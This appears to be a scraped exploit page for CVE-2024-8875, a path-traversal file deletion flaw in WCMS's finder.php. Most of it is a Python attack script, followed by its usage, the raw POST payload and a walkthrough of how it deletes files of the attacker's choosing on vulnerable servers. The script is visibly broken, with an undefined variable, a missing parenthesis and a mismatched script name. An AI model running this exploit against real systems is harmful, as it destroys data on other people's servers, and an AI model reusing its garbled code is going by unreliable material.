Novel Exploit — Arbitrary File Deletion in WCMS (CVE-2024–8875)
OS
Kali LinuxKali
2024.1.*
2020.3.*
2019.4.*
Apps
0.1.2.1.*
0.0.6.1.*
0.1.6.*
0.1.8.*
0.1.7.*
0.2.8.*
0.2.9.*
0.0.9.*
0.2.7.*
0.1.4.*
Screenshots from the blog posts
Summary
In this post, we will explore an arbitrary file deletion vulnerability in Wcms (CVE-2024–8875). We will understand the exploit and use the novel exploit to exploit vulnerable targets and delete the files of our choosing (if the process permissions allow).
- import argparse
- import requests
- import urllib3
- # Disable SSL verification warning for simplicity
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- def validate_url(url):
- if not url.startswith(“http://”) and not url.startswith(“https://”):
- raise ValueError(“Invalid URL schema. Use ‘http://’ or ‘https://'.")
- def exploit(url, path):
- session = requests.Session()
- session.get(f”{url}/wcms/wex/finder.php?p=”, timeout = 10, verify = False)
- try:
- response = requests.post(f”{url}/wcms/wex/finder.php?p=”,
- data = {
- “p”: csrf,
- “group”: “1”,
- “file[]”: path,
- “delete”: “Delete”
- }, timeout = 5, verify = False)
- if response.status_code == 302:
- print(“[*] Specified file has been deleted (if the path was correct) and the
- target was vulnerable to CVE-2024–8875.”)
- return
- except requests.RequestException as e:
- print(f”[-] LOG: An error occurred during the exploitation: {e}”)
- print(“[-] The wcms instance seems NOT to be vulnerable to CVE-2024–8875.”)
- def main():
- parser = argparse.ArgumentParser(description=”Novel exploit for CVE-2024–8875.”)
- parser.add_argument(“ — url”, required = True, help = “URL to send requests to.”)
- parser.add_argument(“ — path”, required = True, help = “File to be deleted (e.g. ../../path/to/file).”)
- args = parser.parse_args()
- validate_url(args.url
- exploit(args.url.rstrip(“/”), args.path)
- if __name__ == “__main__”:
- main()
Description
Introduction
A vulnerability classified as critical was found in vedees wcms up to 0.3.2. Affected by this vulnerability is an unknown functionality of the file /wex/finder.php. The manipulation of the argument p leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8875
Exploitation Script Usage
```
kali@kali:/tmp$ python3 exploit.py -h
usage: exploit.py [-h] --url URL --path PATH
Novel exploit for CVE-2024-8875.
options:
-h, --help show this help message and exit
--url URL URL to send requests to.
--path PATH File to be deleted (e.g. ../../path/to/file).
kali@kali:/tmp$
```
Exploiting Vulnerable Targets
python3 detection.py --url http://vuln.wcms.local
Understanding exploitation script
The exploitation script works as follows:
- Read user input (the URL to target and the path to the file to be deleted).
- The supplied URL is then validated.
- If the URL is valid, it is passed to the
exploit()
function along with the path to the file to be deleted. - Next, a GET request is sent to the target to get the session id (PHPSESSID).
- Next, a POST request to delete a file is sent to the target (in the same HTTP request session).
- The following payload is sent in the POST request
p=&group=1&file%5B%5D=PATH_OF_FILE_TO_BE_DELETED&delete=Delete
. - The
file[]
parameter contains the path of the file to be deleted. - If the target is vulnerable, the provided file is deleted from the server and it can be verified by checking the server files
Tags
#trendingCVE#open-source#php#novel#security-trends#novel-exploit#path-traversal#arbitrary-file-deletion#wcms